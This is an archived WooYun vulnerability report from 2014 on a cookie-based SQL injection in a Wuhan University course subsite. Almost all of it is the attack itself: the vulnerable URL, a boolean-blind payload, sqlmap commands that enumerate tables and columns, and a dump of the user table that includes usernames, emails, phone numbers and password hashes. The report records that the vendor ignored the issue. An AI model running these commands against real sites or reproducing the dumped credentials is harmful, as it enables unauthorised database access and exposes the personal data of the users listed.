乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-05-30: 细节已通知厂商并且等待厂商处理中 2014-06-04: 厂商已经主动忽略漏洞,细节向公众公开
武汉大学某分站#Cookie Injection
Cookie Injection地址:
http://jpkt.whu.edu.cn/jpkc2003/ytysbx/DownloadShow.asp?ID=73
---Place: CookieParameter: ID Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: ID=73 AND 1286=1286---
#1、获取表段:
sqlmap -u http://jpkt.whu.edu.cn/jpkc2003/ytysbx/DownloadShow.asp --cookie ID=73 --table --level 2
Database: Microsoft_Access_masterdb[10 tables]+----------+| user || book || download || email || job || links || main || news || product || vote |+----------+
#2、获取字段:
sqlmap -u http://jpkt.whu.edu.cn/jpkc2003/ytysbx/DownloadShow.asp --cookie ID=73 --columns -T user --leve 2
Database: Microsoft_Access_masterdbTable: user[14 columns]+----------------+-------------+| Column | Type |+----------------+-------------+| bigclassname | non-numeric || email | non-numeric || homepage | non-numeric || id | numeric || logins | numeric || password | non-numeric || phone | non-numeric || question | numeric || smallclassname | non-numeric || system | non-numeric || title | non-numeric || userid | numeric || username | non-numeric || zip | numeric |+----------------+-------------+
#3、猜解内容:
sqlmap -u http://jpkt.whu.edu.cn/jpkc2003/ytysbx/DownloadShow.asp --cookie ID=73 --dump -T user -C email,phone,system,username,password --leve 2
Database: Microsoft_Access_masterdbTable: user[5 entries]+-----------------+------------------+-----------------------+-----------+------------------+| phone | email | system | username | password |+-----------------+------------------+-----------------------+-----------+------------------+| +8611 | [email protected] | Win98, Win2000, WinXP | eeeeee | f753a06ee79fc75d || +8611111 | [email protected] | Win98, Win2000, WinXP | 111111 | 965eb72c92a549dd || +86-02-63763008 | [email protected] | Win98, Win2000, WinXP | gaoqiao | 2042282e8b8dd9a3 || +8622 | [email protected] | Win98, Win2000, WinXP | 222222 | 1a0a1fdaad01296d || 82727878 | [email protected] | Win98, Win2000, WinXP | wangliang | <blank> |+-----------------+------------------+-----------------------+-----------+------------------+
:)
危害等级:无影响厂商忽略
忽略时间:2014-06-04 15:28
暂无